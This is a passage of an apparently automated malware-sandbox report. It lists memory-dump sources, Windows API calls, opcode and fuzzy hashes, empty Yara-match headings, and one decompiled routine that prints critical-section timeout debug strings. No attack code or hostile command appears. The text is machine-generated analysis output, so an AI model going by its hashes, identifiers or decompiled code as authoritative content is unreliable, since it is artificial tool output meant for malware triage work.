                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction ID: 1a468313fb24825e4b66caa169b72ce73acaa7ae8ecf3c854f1d2d29f88f292c
                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction Fuzzy Hash: 0DE01AB12002186BDB10DF49CC84EE737ADAF88650F018555BE4857241C934E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,02448CF4,?), ref: 0244F6CB
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 554306b3aa01e10ad0c7a997f061edf6c1e11df0f2a4c67a6644c38bdfc66c35
                                                        • Instruction ID: 11c12f0457223bc13e3c6b721fe18dd8086ceeba570c913949c9006d251bde0b
                                                        • Opcode Fuzzy Hash: 554306b3aa01e10ad0c7a997f061edf6c1e11df0f2a4c67a6644c38bdfc66c35
                                                        • Instruction Fuzzy Hash: 7BD0A7717903043BF610FEA59C03F2732CD5B44B04F490065FA89DB3C3ED50E0014565
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 548780de4bc8dc64901c03632df03ee8897120f0add118c66814d3824fda36cf
                                                        • Instruction ID: fec7fd2a346a23c1b599e8e74a0a6333b4f1e0febbf9002867861cb0a367a297
                                                        • Opcode Fuzzy Hash: 548780de4bc8dc64901c03632df03ee8897120f0add118c66814d3824fda36cf
                                                        • Instruction Fuzzy Hash: 9FB09BF1D024C5C5FF11E7604608F1B790077E0745F16C157D1020655A477CD091F5B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 53%
                                                        			E044CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                        				void* _t7;
                                                        				intOrPtr _t9;
                                                        				intOrPtr _t10;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t13;
                                                        				intOrPtr _t14;
                                                        				intOrPtr* _t15;
                                                        
                                                        				_t13 = __edx;
                                                        				_push(_a4);
                                                        				_t14 =  *[fs:0x18];
                                                        				_t15 = _t12;
                                                        				_t7 = E0447CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                        				_push(_t13);
                                                        				E044C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                        				_t9 =  *_t15;
                                                        				if(_t9 == 0xffffffff) {
                                                        					_t10 = 0;
                                                        				} else {
                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                        				}
                                                        				_push(_t10);
                                                        				_push(_t15);
                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                        				return E044C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                        			}










                                                        0x044cfdda
                                                        0x044cfde2
                                                        0x044cfde5
                                                        0x044cfdec
                                                        0x044cfdfa
                                                        0x044cfdff
                                                        0x044cfe0a
                                                        0x044cfe0f
                                                        0x044cfe17
                                                        0x044cfe1e
                                                        0x044cfe19
                                                        0x044cfe19
                                                        0x044cfe19
                                                        0x044cfe20
                                                        0x044cfe21
                                                        0x044cfe22
                                                        0x044cfe25
                                                        0x044cfe40

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044CFDFA
                                                        Strings
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044CFE01
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044CFE2B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.496085261.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                                        • Associated: 0000000C.00000002.496600844.000000000452B000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.496631486.000000000452F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: aaeada1454ac5648527800afa60d9d7d4f95328168fe8a0fc61ca07baa432aa8
                                                        • Instruction ID: 3deb99049ac7fa037a601bd80f106faff299cfba1c183cd4667919259bd5548a
                                                        • Opcode Fuzzy Hash: aaeada1454ac5648527800afa60d9d7d4f95328168fe8a0fc61ca07baa432aa8
                                                        • Instruction Fuzzy Hash: 61F0FC36240111BFFF201A46DC05F737F5AEB44730F28431AF624555D1D962F86096F4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%